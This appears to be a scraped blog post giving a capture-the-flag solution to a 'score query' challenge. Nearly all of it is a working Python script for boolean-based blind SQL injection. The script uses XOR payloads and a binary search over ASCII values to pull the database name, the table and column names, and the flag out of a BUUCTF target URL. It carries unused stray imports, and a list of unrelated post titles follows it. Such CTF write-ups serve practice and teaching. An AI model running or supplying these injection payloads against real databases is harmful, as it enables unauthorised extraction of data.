当前位置:网站首页>Bool blind note - score query
Bool blind note - score query
2022-07-03 19:39:00 【Forever culvert】
from aiohttp import Payload
from cherrypy import url
import requests
import time
from sympy import parallel_poly_from_expr
url = "http://0cfdc5c8-c87c-4e7f-b632-7f6c6ff7a2d0.node4.buuoj.cn:81/?stunum="
payload1 = "1^(ascii(substr((select(database())),{},1))>{})^1"
payload2 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"
payload3 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1"
payload4 = "1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1"
database = ""
for x in range(1, 1000):
low = 32
high = 127
mid = (low+high) // 2
while low < high:
playload = payload4.format(x, mid)
new_url = url + playload
r = requests.get(new_url)
if "Hi admin, your score is: 100" in r.text:
low = mid + 1
else:
high = mid
mid = (low+high) // 2
if (mid == 32 or mid == 132):
break
database += chr(mid)
print(database)
time.sleep(1)
print(database)
# ctf
# flag,score
# flag,value
边栏推荐
- Merge K ascending linked lists
- 交叉编译Opencv带Contrib
- Chapter 1: King Shehan miscalculated
- JMeter connection database
- 第一章: 舍罕王失算
- Use unique_ PTR forward declaration? [repetition] - forward declaration with unique_ ptr? [duplicate]
- Comments on flowable source code (37) asynchronous job processor
- Free year-end report summary template Welfare Collection
- Free sharing | linefriends hand account inner page | horizontal grid | not for sale
- 2022-07-02 网工进阶(十五)路由策略-Route-Policy特性、策略路由(Policy-Based Routing)、MQC(模块化QoS命令行)
猜你喜欢
第一章:三位阶乘和数,图形点扫描
2022-07-02 advanced network engineering (XV) routing policy - route policy feature, policy based routing, MQC (modular QoS command line)
Think of new ways
Chapter 1: recursively find the factorial n of n!
Chapter 1: find the algebraic sum of odd factors, find the same decimal sum s (D, n), simplify the same code decimal sum s (D, n), expand the same code decimal sum s (D, n)
2022 Xinjiang latest construction eight members (standard members) simulated examination questions and answers
Sentinel source code analysis part II - sentinel dashboard console startup and configuration
[free sharing] kotalog diary2022 plan electronic manual ledger
Xctf attack and defense world crypto master advanced area olddriver
Basic principle of LSM tree
随机推荐
How does if ($variable) work? [repeat] - how exactly does if ($variable) work? [duplicate]
Summary of composition materials for 2020 high-frequency examination center of educational resources
Chapter 1: King Shehan miscalculated
01. Preparation for automated office (free guidance, only three steps)
Chapter 1: recursively find the factorial n of n!
math_ Taylor formula
Flume learning notes
During MySQL installation, the download interface is empty, and the components to be downloaded are not displayed. MySQL installer 8.0.28.0 download interface is empty solution
P3402 persistent and searchable
第二章:求a,b的最大公约与最小公倍数经典求解,求a,b的最大公约与最小公倍数常规求解,求n个正整数的的最大公约与最小公倍数
原生表格-滚动-合并功能
Floating source code comment (38) parallel job processor
2022.2.14 Li Kou - daily question - single element in an ordered array
Think of new ways
Next spread
FPGA 学习笔记:Vivado 2019.1 工程创建
Comments on flowable source code (37) asynchronous job processor
10 smart contract developer tools that miss and lose
2020 intermediate financial management (escort class)
Bad mentality leads to different results